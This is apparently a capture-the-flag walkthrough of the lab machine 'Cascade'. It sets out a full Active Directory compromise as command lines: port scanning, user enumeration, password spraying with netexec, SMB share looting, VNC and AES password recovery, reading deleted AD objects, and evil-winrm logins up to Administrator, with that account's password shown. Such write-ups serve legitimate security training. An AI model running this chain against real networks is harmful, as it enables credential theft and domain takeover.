-
The first step is to perform a scan of the open ports and then list the versions and technologies used on the open ports.
nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.10.182 -oG scan
/opt/extractports scan
nmap -p53,88,135,139,389,445,636,3268,3269,5985,49154,49155,49157,49158,49165 -sCV -Pn 10.10.10.182 -oN ports
- I found the domain
cascade.local and I add it to the file in the hosts file
-
I start enumerating the users that belong to the system with enum4linux, obtain a list and validate them with kerbrute .
enum4linux 10.10.10.182
/opt/kerbrute userenum -d cascade.local --dc 10.10.10.182 usernames
-
Having a general idea of the users of the system, I decide to list more information about each of them.
ldapsearch -x -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local"
-
While reviewing these users’ information, I find a field that appears to contain a possible password for the user r.thompson.
-
I convert the possible password found in base64 and validate it with the list of users I have previously found. I find that the password is valid for the user r.thompson.
netexec smb 10.10.10.182 -u usernames -p XXXXXXX
-
With these valid credentials I list the shared resources by SMB and I see that I have read permissions on the “Data” directory which is not common.
-
I connect to the directory and within it I find several relevant files.
smbclient \\\\10.10.10.182\\Data --user=r.thompson --password=XXXXXXX
-
I find an email stating that the user “TempAdmin” has the same password as the Administrator account. Reviewing the users that I had found so far I see that this is no longer part of the system so it must have been deleted at some point.
-
In another directory I find a configuration file for a VNC, inside this I find a capo that indicates a password in hexadecimal. I try to revert it but I get several unreadable characters so I have to look for another way to get it.
echo "6bXXXXXXXXXXXX0f" | xxd -ps -r > password_vnc
-
After searching for information about Virtual Network Computing (VNC), I find a github repository by jeroennijhof that allows to revert the password by passing the complete configuration file. By using this script I manage to get a clear text password. I validate it with the user listing I had previously found and it tells me that it belongs to the user s.smith.
-
I verify if with the credentials of this user I can connect to the system through WinRM and it tells me that I can. I connect and I can read the first flag of the system.
netexec winrm 10.10.10.182 -u s.smith -p XXXXXXX
evil-winrm -i 10.10.10.182 -u s.smith -p XXXXXXX
-
Listing the users of the system I notice that there is the user ArkSvc that belongs to the group “AD Recycle Bin”. This group has the ability to read objects that have been deleted in the system.
ldapdomaindump -u 'cascade.local\s.smith' -p 'XXXXXXX' 10.10.10.182
-
As we had previously read in an email, the user “TempAdmin” had the same password as the administrator so if we can become ArkSvc, we have a chance to read the deleted TempAdmin object and get its password in order to escalate our privileges and become Administrator.
-
I start by looking information about the user I have credentials for, s.smith. It strikes me that he belongs to two unusual fields, IT and Audit share.
-
While researching information about this second group, I come across a comment mentioning a path to a potential resource. I access it and discover an application along with its DLL files, configuration files, and a database named “Audit.db”.
-
I bring the database to my machine and when I open it I find in a table the user ArkSvc and an encrypted password.
- I try to brute force the password in clear text and I am not able to get it so I have to analyze the program to understand how this encrypted password has been constructed.
- I download all the program files to run them through dotpeek to be able to analyze its code.
-
Inside the code I find the function used to encrypt the passwords. It uses AES encryption and within the code itself appears both the IV and the Key so I can get the password in clear text. For this I use CyberChef and I get the password.
-
I validate the password for the ArkSvc user and confirm that it belongs to them. Using these credentials, I successfully log into the system via WinRM.
evil-winrm -i 10.10.10.182 -u ArkSvc -p XXXXXXX
-
As the user ArkSvc, and assuming that members of the AD Recycle Bin group can read the deleted TempAdmin object, I execute the query:
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
#If I want to query only the TempAdmin object
Get-ADObject -filter {isDeleted -eq $true -and DisplayName -eq "TempAdmin"} -IncludeDeletedObjects -Properties *
-
I decode the password from Base64 and validate it. It works for the Administrator user, so I connect to the system via WinRM as this user and successfully retrieve the second system flag.
evil-winrm -i 10.10.10.182 -u Administrator -p baCT3r1aN00dles
